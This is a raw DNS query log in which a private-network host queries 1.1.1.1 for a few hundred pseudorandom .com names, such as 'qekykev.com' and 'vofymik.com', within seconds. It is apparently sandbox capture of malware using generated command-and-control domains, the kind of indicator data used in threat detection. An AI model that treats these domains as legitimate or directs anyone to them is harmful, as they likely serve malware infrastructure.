Nov 11, 2024 18:13:24.624118090 CET	192.168.2.6	1.1.1.1	0x29bb	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.624696016 CET	192.168.2.6	1.1.1.1	0x3e27	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.627197981 CET	192.168.2.6	1.1.1.1	0x7bff	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.628998041 CET	192.168.2.6	1.1.1.1	0xc2c	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.629658937 CET	192.168.2.6	1.1.1.1	0x7068	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.630122900 CET	192.168.2.6	1.1.1.1	0x5d17	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.630774021 CET	192.168.2.6	1.1.1.1	0xcfab	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.632230043 CET	192.168.2.6	1.1.1.1	0x9991	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.634310961 CET	192.168.2.6	1.1.1.1	0x948e	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.634625912 CET	192.168.2.6	1.1.1.1	0x68a2	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.634912014 CET	192.168.2.6	1.1.1.1	0x4dc1	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.635632038 CET	192.168.2.6	1.1.1.1	0xf51	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.635870934 CET	192.168.2.6	1.1.1.1	0x56e0	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.636069059 CET	192.168.2.6	1.1.1.1	0x4950	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.636347055 CET	192.168.2.6	1.1.1.1	0x3ad5	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.636671066 CET	192.168.2.6	1.1.1.1	0xa4ca	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.637413979 CET	192.168.2.6	1.1.1.1	0xb391	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.637691021 CET	192.168.2.6	1.1.1.1	0x8ecb	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.637768984 CET	192.168.2.6	1.1.1.1	0xb054	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.638343096 CET	192.168.2.6	1.1.1.1	0x9f3	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639013052 CET	192.168.2.6	1.1.1.1	0x95ab	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639095068 CET	192.168.2.6	1.1.1.1	0x477a	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.639698029 CET	192.168.2.6	1.1.1.1	0x8e5f	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.640907049 CET	192.168.2.6	1.1.1.1	0x3482	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.644756079 CET	192.168.2.6	1.1.1.1	0xfa3f	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.662513971 CET	192.168.2.6	1.1.1.1	0x3353	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.666150093 CET	192.168.2.6	1.1.1.1	0x16ad	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.777339935 CET	192.168.2.6	1.1.1.1	0xf806	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.780863047 CET	192.168.2.6	1.1.1.1	0x994e	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.784533024 CET	192.168.2.6	1.1.1.1	0x26fc	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.795325041 CET	192.168.2.6	1.1.1.1	0xc59d	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.795705080 CET	192.168.2.6	1.1.1.1	0xe20a	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.802500963 CET	192.168.2.6	1.1.1.1	0x9ff0	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.802747011 CET	192.168.2.6	1.1.1.1	0x471	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.857240915 CET	192.168.2.6	1.1.1.1	0x2d44	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.897624016 CET	192.168.2.6	1.1.1.1	0x6e1a	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.938561916 CET	192.168.2.6	1.1.1.1	0x412	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.942970991 CET	192.168.2.6	1.1.1.1	0x3d3a	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.947535992 CET	192.168.2.6	1.1.1.1	0xd2e0	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.952128887 CET	192.168.2.6	1.1.1.1	0xb5c8	Standard query (0)	puzybeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.973017931 CET	192.168.2.6	1.1.1.1	0x551e	Standard query (0)	pujycil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.973880053 CET	192.168.2.6	1.1.1.1	0x717b	Standard query (0)	gatyrah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.975994110 CET	192.168.2.6	1.1.1.1	0xbbfc	Standard query (0)	vojycit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.976883888 CET	192.168.2.6	1.1.1.1	0x24f2	Standard query (0)	lyxynej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:24.978070974 CET	192.168.2.6	1.1.1.1	0x3569	Standard query (0)	vofyzyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.102166891 CET	192.168.2.6	1.1.1.1	0x5d9e	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.108886957 CET	192.168.2.6	1.1.1.1	0xe629	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.109016895 CET	192.168.2.6	1.1.1.1	0xf4be	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.111696959 CET	192.168.2.6	1.1.1.1	0x73c7	Standard query (0)	vowyqik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.111881018 CET	192.168.2.6	1.1.1.1	0x5e10	Standard query (0)	gahycuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.112144947 CET	192.168.2.6	1.1.1.1	0xc034	Standard query (0)	gacyfeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.112329960 CET	192.168.2.6	1.1.1.1	0xf47a	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:25.112643957 CET	192.168.2.6	1.1.1.1	0xe9f8	Standard query (0)	lygyxux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.850748062 CET	192.168.2.6	1.1.1.1	0xe48f	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.852122068 CET	192.168.2.6	1.1.1.1	0xe27c	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.856211901 CET	192.168.2.6	1.1.1.1	0x6290	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.863133907 CET	192.168.2.6	1.1.1.1	0xc5dc	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.865645885 CET	192.168.2.6	1.1.1.1	0x95f9	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.867909908 CET	192.168.2.6	1.1.1.1	0x276	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.870023012 CET	192.168.2.6	1.1.1.1	0x6001	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.875346899 CET	192.168.2.6	1.1.1.1	0x3f70	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.877036095 CET	192.168.2.6	1.1.1.1	0x37ed	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.884263992 CET	192.168.2.6	1.1.1.1	0x50f1	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.903409004 CET	192.168.2.6	1.1.1.1	0xd388	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.903800964 CET	192.168.2.6	1.1.1.1	0xad59	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.905056000 CET	192.168.2.6	1.1.1.1	0x433e	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.936322927 CET	192.168.2.6	1.1.1.1	0xffc9	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.936484098 CET	192.168.2.6	1.1.1.1	0x683b	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.936626911 CET	192.168.2.6	1.1.1.1	0x74d6	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.936778069 CET	192.168.2.6	1.1.1.1	0x2016	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.936917067 CET	192.168.2.6	1.1.1.1	0x7eac	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.937052965 CET	192.168.2.6	1.1.1.1	0x885c	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.937321901 CET	192.168.2.6	1.1.1.1	0xc43e	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.937612057 CET	192.168.2.6	1.1.1.1	0x616f	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.937745094 CET	192.168.2.6	1.1.1.1	0x1344	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.937892914 CET	192.168.2.6	1.1.1.1	0x6e2c	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.938030005 CET	192.168.2.6	1.1.1.1	0x31aa	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.938168049 CET	192.168.2.6	1.1.1.1	0x39b6	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.953042030 CET	192.168.2.6	1.1.1.1	0xdc1c	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.955373049 CET	192.168.2.6	1.1.1.1	0x45c7	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.955532074 CET	192.168.2.6	1.1.1.1	0xd941	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.955713034 CET	192.168.2.6	1.1.1.1	0x89c6	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.955748081 CET	192.168.2.6	1.1.1.1	0xcd5f	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.976151943 CET	192.168.2.6	1.1.1.1	0xd5e0	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.977761030 CET	192.168.2.6	1.1.1.1	0xdb35	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.977870941 CET	192.168.2.6	1.1.1.1	0x3e60	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978003025 CET	192.168.2.6	1.1.1.1	0xa32e	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978066921 CET	192.168.2.6	1.1.1.1	0x651e	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978218079 CET	192.168.2.6	1.1.1.1	0xeaf3	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978377104 CET	192.168.2.6	1.1.1.1	0xf559	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978444099 CET	192.168.2.6	1.1.1.1	0xbe87	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978540897 CET	192.168.2.6	1.1.1.1	0x4278	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978619099 CET	192.168.2.6	1.1.1.1	0x15f4	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978724957 CET	192.168.2.6	1.1.1.1	0x83cb	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978790045 CET	192.168.2.6	1.1.1.1	0xbfe	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978895903 CET	192.168.2.6	1.1.1.1	0xcd3b	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.978940964 CET	192.168.2.6	1.1.1.1	0xca96	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.979111910 CET	192.168.2.6	1.1.1.1	0x875e	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.979531050 CET	192.168.2.6	1.1.1.1	0xd9e8	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.979728937 CET	192.168.2.6	1.1.1.1	0x5806	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.979883909 CET	192.168.2.6	1.1.1.1	0x90d2	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980036974 CET	192.168.2.6	1.1.1.1	0x3898	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980189085 CET	192.168.2.6	1.1.1.1	0x72b	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980354071 CET	192.168.2.6	1.1.1.1	0xb423	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980510950 CET	192.168.2.6	1.1.1.1	0x94f1	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980658054 CET	192.168.2.6	1.1.1.1	0x178e	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980829000 CET	192.168.2.6	1.1.1.1	0x2564	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.980988026 CET	192.168.2.6	1.1.1.1	0x5562	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.981223106 CET	192.168.2.6	1.1.1.1	0x676a	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.981638908 CET	192.168.2.6	1.1.1.1	0x2759	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.984220982 CET	192.168.2.6	1.1.1.1	0xc32d	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:28.984257936 CET	192.168.2.6	1.1.1.1	0x43a9	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.137864113 CET	192.168.2.6	1.1.1.1	0x5d3d	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.145159960 CET	192.168.2.6	1.1.1.1	0xa12f	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.161514997 CET	192.168.2.6	1.1.1.1	0x9267	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.180037975 CET	192.168.2.6	1.1.1.1	0x58af	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.193443060 CET	192.168.2.6	1.1.1.1	0x32a	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.206515074 CET	192.168.2.6	1.1.1.1	0x58fc	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.208904982 CET	192.168.2.6	1.1.1.1	0x8f65	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.209439039 CET	192.168.2.6	1.1.1.1	0x5f29	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.252800941 CET	192.168.2.6	1.1.1.1	0x10c0	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.263993979 CET	192.168.2.6	1.1.1.1	0x5d7e	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.264791012 CET	192.168.2.6	1.1.1.1	0xd288	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.340703964 CET	192.168.2.6	1.1.1.1	0xc4b5	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.348736048 CET	192.168.2.6	1.1.1.1	0x53b9	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.349683046 CET	192.168.2.6	1.1.1.1	0x4e88	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.368113995 CET	192.168.2.6	1.1.1.1	0xff58	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.370193958 CET	192.168.2.6	1.1.1.1	0xe9fd	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.378870010 CET	192.168.2.6	1.1.1.1	0x9d0	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.380770922 CET	192.168.2.6	1.1.1.1	0xa8b7	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.402923107 CET	192.168.2.6	1.1.1.1	0x1120	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.409113884 CET	192.168.2.6	1.1.1.1	0xe56c	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.419281960 CET	192.168.2.6	1.1.1.1	0x4e7d	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.555912971 CET	192.168.2.6	1.1.1.1	0x3726	Standard query (0)	gacynuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.556931019 CET	192.168.2.6	1.1.1.1	0xdb89	Standard query (0)	lygysij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.557965994 CET	192.168.2.6	1.1.1.1	0x5645	Standard query (0)	gaqykab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.560534000 CET	192.168.2.6	1.1.1.1	0x99f2	Standard query (0)	purylev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.569071054 CET	192.168.2.6	1.1.1.1	0x4d16	Standard query (0)	vowykaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.585695982 CET	192.168.2.6	1.1.1.1	0x935a	Standard query (0)	pufypiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.590470076 CET	192.168.2.6	1.1.1.1	0xf703	Standard query (0)	qetylyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.611571074 CET	192.168.2.6	1.1.1.1	0xc26c	Standard query (0)	pupyxup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.617664099 CET	192.168.2.6	1.1.1.1	0x4cb0	Standard query (0)	qekyfeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.621968031 CET	192.168.2.6	1.1.1.1	0x8ce0	Standard query (0)	purytyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.662405968 CET	192.168.2.6	1.1.1.1	0xd1b3	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.667449951 CET	192.168.2.6	1.1.1.1	0xa90c	Standard query (0)	lyryled.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.692327976 CET	192.168.2.6	1.1.1.1	0x98ba	Standard query (0)	vojydam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.797091961 CET	192.168.2.6	1.1.1.1	0xae25	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.919466972 CET	192.168.2.6	1.1.1.1	0xc4af	Standard query (0)	qedysov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.926557064 CET	192.168.2.6	1.1.1.1	0xb068	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.935220003 CET	192.168.2.6	1.1.1.1	0x7515	Standard query (0)	qekynuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.938868999 CET	192.168.2.6	1.1.1.1	0xf220	Standard query (0)	puvyjop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.953946114 CET	192.168.2.6	1.1.1.1	0x574c	Standard query (0)	lysyxux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.961440086 CET	192.168.2.6	1.1.1.1	0xa495	Standard query (0)	lyvyjox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.962474108 CET	192.168.2.6	1.1.1.1	0xfe14	Standard query (0)	vocyjic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:35.989726067 CET	192.168.2.6	1.1.1.1	0xd89d	Standard query (0)	vojybek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.025599957 CET	192.168.2.6	1.1.1.1	0x65cd	Standard query (0)	pupypiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.040296078 CET	192.168.2.6	1.1.1.1	0x81e1	Standard query (0)	gatypub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.043292999 CET	192.168.2.6	1.1.1.1	0x9c90	Standard query (0)	qebykap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.043519020 CET	192.168.2.6	1.1.1.1	0xef43	Standard query (0)	lyrytun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.043718100 CET	192.168.2.6	1.1.1.1	0xa236	Standard query (0)	lysysod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.043890953 CET	192.168.2.6	1.1.1.1	0xd59f	Standard query (0)	vopypif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.044085026 CET	192.168.2.6	1.1.1.1	0xb30e	Standard query (0)	qetytug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.044228077 CET	192.168.2.6	1.1.1.1	0xed18	Standard query (0)	ganykaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.044629097 CET	192.168.2.6	1.1.1.1	0x2708	Standard query (0)	pumylel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.045100927 CET	192.168.2.6	1.1.1.1	0x5229	Standard query (0)	gahyvew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.050421000 CET	192.168.2.6	1.1.1.1	0x6889	Standard query (0)	pumywaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.053086996 CET	192.168.2.6	1.1.1.1	0xe13f	Standard query (0)	galyfyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.056080103 CET	192.168.2.6	1.1.1.1	0x1029	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.057113886 CET	192.168.2.6	1.1.1.1	0xb877	Standard query (0)	lymywaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.057595968 CET	192.168.2.6	1.1.1.1	0x5f9b	Standard query (0)	volygyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.059895039 CET	192.168.2.6	1.1.1.1	0xc001	Standard query (0)	vocymut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.060726881 CET	192.168.2.6	1.1.1.1	0x7177	Standard query (0)	qedyxip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.084989071 CET	192.168.2.6	1.1.1.1	0x223c	Standard query (0)	qeqyreq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.086456060 CET	192.168.2.6	1.1.1.1	0xb117	Standard query (0)	lyxygud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.087222099 CET	192.168.2.6	1.1.1.1	0xe59	Standard query (0)	gaqyreh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.089874029 CET	192.168.2.6	1.1.1.1	0x5ee7	Standard query (0)	pufycol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.090091944 CET	192.168.2.6	1.1.1.1	0x48f2	Standard query (0)	lygyvar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.090306044 CET	192.168.2.6	1.1.1.1	0xd81d	Standard query (0)	vowyrym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.090553045 CET	192.168.2.6	1.1.1.1	0xf2c0	Standard query (0)	gacyhis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.090723038 CET	192.168.2.6	1.1.1.1	0xdd2a	Standard query (0)	vonyket.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.108623981 CET	192.168.2.6	1.1.1.1	0xa470	Standard query (0)	qegysoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.123994112 CET	192.168.2.6	1.1.1.1	0xcf23	Standard query (0)	gatyzys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.159653902 CET	192.168.2.6	1.1.1.1	0xa112	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.169064045 CET	192.168.2.6	1.1.1.1	0xc188	Standard query (0)	lykyfen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.169759989 CET	192.168.2.6	1.1.1.1	0x5209	Standard query (0)	vopyzuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.170139074 CET	192.168.2.6	1.1.1.1	0xbcd9	Standard query (0)	pujydag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.170646906 CET	192.168.2.6	1.1.1.1	0xcf85	Standard query (0)	pujybyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.171174049 CET	192.168.2.6	1.1.1.1	0xfd3f	Standard query (0)	vonyqok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.171478987 CET	192.168.2.6	1.1.1.1	0xfa7e	Standard query (0)	gahydoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:36.221884966 CET	192.168.2.6	1.1.1.1	0x9831	Standard query (0)	qexynyp.com	A (IP address)	IN (0x0001)	false
